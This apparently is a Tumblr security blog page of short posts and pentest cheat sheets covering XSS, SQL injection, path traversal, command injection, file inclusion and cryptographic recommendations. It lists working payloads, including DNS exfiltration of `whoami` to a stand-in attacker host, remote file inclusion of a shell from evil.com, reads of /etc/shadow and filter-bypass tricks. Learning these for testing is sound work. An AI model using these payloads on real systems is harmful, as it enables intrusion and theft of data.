YevhSec @yevhsec - Tumblr Blog

Details of 10.6 million MGM hotel guests posted on a hacking forum

Source: https://www.zdnet.com/article/exclusive-details-of-10-6-million-of-mgm-hotel-guests-posted-on-a-hacking-forum/

It seems to me that some organizations are mistaken in stating that they have a full SDLC only when they running a static analysis using something like Coverity.

Sometimes sqlmap shows that one of the parameters is vulnerable, but then you notice that need to play with different tamper values to break through some kind of firewall, and of course, this is not always successful.

What you think about the “12 word phrase” as a secured flow for password restoring? This third-party library used by such companies like blockchain.com, nash.io, and others. But what if I say that all validation occurs on the client-side with informative errors for T and F statements and all possible phrases are stored in the JS file? My ticket on HakeOne was declined, apparently that it is absolutely secured flow for password restoring ;)

ericvanderburg

Sudo CVE-2019-18634 flaw allows Non-Privileged Linux and macOS Users run commands as Root

http://i.securitythinkingcap.com/RPK4pJ

Why people deploy applications with turned on dev mode in production release?

levigross

Penetration Testing Django and Rails

Here are the slides for the talk I gave last night at OWASP NY/NJ.

Pentesting django and rails View more presentations from levigross.

I reported this vulnerability almost half a year ago, but it has not been fixed yet.

randomlabs

VirusSecurityPatrouille

Cross Site Scripting

Types of XSS injections:

1)Stored - it is possible when a website or web application stores user input and later serves it to other users. An application is vulnerable if it does not validate user input before storing content and embedding it into HTML response pages.

2)Reflected - the attacker’s payload has to be a part of the request that is sent to the web server. It is then reflected back in such a way that the HTTP response includes the payload from the HTTP request. Attackers use malicious links, phishing emails, and other social engineering techniques to lure the victim into making a request to the server.

3)DOM base - It is possible if the web application’s client-side scripts write data provided by the user to the Document Object Model (DOM). The data is subsequently read from the DOM by the web application and outputted to the browser. If the data is incorrectly handled, an attacker can inject a payload, which will be stored as part of the DOM and executed when the data is read back from the DOM.

4) Universal Cross-site Scripting - Unlike the common XSS attacks, UXSS is a type of attack that exploits client-side vulnerabilities in the browser or browser extensions in order to generate an XSS condition, and execute malicious code. When such vulnerabilities are found and exploited, the behavior of the browser is affected and its security features may be bypassed or disabled.

Vailable for manipulation:

DOM

Connectivity

Async JS requests

Toolset: Acunteix, w3af, Beef

Basic payload:

Image payload:

HTML5 payload:

SQL injection

The SQL injection is one of the most common code injection technique that aims at getting access to the database. It's possible by improper handling of user input by the application.

Related to: -Language: SQL -Platform: Any (requires interaction with a SQL database)

Types of SQL injection:

Error based

Boolean based blind

Time based blind

Toolset: SQL Map

Detection

Detection of Error based SQL injection:

;

)

Encoding:

%27

%22

%23

%3B

Multiple encoding:

%%2727

%%2222

%%2323

%%3B3B

Detection of Boolean based blind SQL injection:

TRUE statements:

aNd 1=1

aNd 21=21

anD 1=1;//

orDeR bY 1

FALSE statements:

dNd 0=1

anD 9=2

anD 57=276;//

ordEr bY 1000000000000

Characters to use instead of spaces:

/**/

%20

Comments to end the queries:

%23

Detection of Time based blind:

aNd sleep

SLEEP(15)

BENCHMARK(100000000, rand())

WAIT FOR DELAY '00:00:15'

WAIT FOR TIME '00:00:15'

Exploitation

General select syntax:

Notes:

When you executing queries you need to consider encodings.

Example of encoding query to utf8:

UniOn select table_name COLLATE utf8_general_ci,table_schema COLLATE utf8_general_ci,'1' from information_schema.tables

SQL Map

Path traversal

A directory traversal (or path traversal) consists in exploiting insufficient security validation / sanitization of user-supplied input file names, such that characters representing "traverse to parent directory" are passed through to the file APIs.

Where to detect?

Check dynamic URL:

https://yevh.ye/img/loadImage?filename=ye.jpj

Check page elements:

Basic checks:

../

..\

..../

....\/

....//

....\\

Encoding:

..%c0%af

..%252f

%2e%2e%2f

%252e%252e%252f

%c0%ae%c0%ae%c0%af

%uff0e%uff0e%u2215

%uff0e%uff0e%u2216

Expected base folder:

/var/www/images/../../../etc/passwd

Expected file extension:

/var/www/images/../../../etc/passwd%00.jpj

Popular servers path:

/var/www/ - Apache

/etc/nginx/ - NGINX

Linux interesting files:

/etc/passwd

/etc/shadow

/proc/self/environ

/etc/mysql/my.cnf

/proc/net/route

Windows interesting files:

\windows\win.ini

\inetpub\logs\logfiles

\Users\Administrator\NTUser.dat

\Administrator\NTUser.dat

\apache\logs\access.log

\apache\logs\error.log

\apache\php\php.ini

References

OWASP

Command Injection

OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data.

Useful commands:

Linux:

whoami --- Name of current user.

uname -a --- Operating system.

ifconfig --- Network configuration.

netstat -an --- Network connections.

ps -ef --- Running processes.

Windows:

whoami --- Name of current user.

ver --- Operating system.

ipconfig /all --- Network configuration.

netstat -an --- Network connections.

tasklist --- Running processes.

Basic payloads:

Note: VC = valid_command

VC ;ls --- Execute ls after VC

VC | ls --- Sends the output of VC as input to ls

VC || ls --- Executes ls iff VC returns a nonzero exit status(error)

VC $(ls) --- Sends the output of ls as arguments to VC

VC `ls` --- Sends the output of ls as arguments to VC

VC && ls --- Execute ls after, if VC return 0

Bypass Blacklisted words:

w'h'o'am'i

w"h"o"am"I

w\ho\am\i

/\b\i\n/////s\h

Blind command injection payloads:

& ping -c 10 127.0.0.1 &

& whoami > /var/www/static/whoami.txt &

& nslookup kgji2ohoyw.web-attacker.com &

& nslookup `whoami`.kgji2ohoyw.web-attacker.com &

References:

OWASP

#owasp #cybersecurity #penetration testing #security #information security #command injection #injection

File Inclusion

The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.

Can lead to:

Code execution on the web server.

Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting.

Denial of Service (DoS).

Sensitive Information Disclosure.

Types:

Local File Inclusion(LFI) - is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected.

Remote File Inclusion(RFI) - occurs when the web application downloads and executes a remote file. These remote files are usually obtained in the form of an HTTP or FTP URI as a user-supplied parameter to the web application.

Basic payloads LFI:

http://example.com/index.php?page=../../../etc/passwd

http://example.com/index.php?page=../../../etc/passwd%00

http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00

Basic payloads RFI:

http://example.com/index.php?page=http://evil.com/shell.txt

http://example.com/index.php?page=http://evil.com/shell.txt%00

http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt

References

OWASP

#cybersecurity #penetration testing #file inclusion #security #lfi #rfi #payload #infosec

Cryptographic recommendations

In this sheet presented cryptographic recommendation and libraries to use.

Recommendations:

Key exchange: Diffie–Hellman key exchange with minimum 2048 bits

Message Integrity: HMAC-SHA2

Message Hash: SHA2 256 bits

Assymetric encryption: RSA 2048 bits

Symmetric-key algorithm: AES 128 bits

Password Hashing: Argon2, PBKDF2, Scrypt, Bcrypt

Recommended libraries:

Python: MbedTLS, Libsodium, PyNaCl, Libnacl.

Ruby: Nacl, djb's.

JS: Crypto-js.

Go: Crypto.

Java: Java.security, Javax.crypto.

PHP: Hash, OpenSSL.

C/C++: OpenSSL.

Do not use:

C: random(), rand() ----> getrandom(2)

Java: java.util.Random() ----> java.security.SecureRandom

PHP: rand() or mt_rand() ----> random_int() or random_bytes()

References:

OWASP Guide to Cryptography Mozilla TLS wiki

#cybersecurity #penetration test #security #cryptographic #libraries #infosec #payload #recommendation

Trending Blogs

Recently Viewed Blogs

YevhSec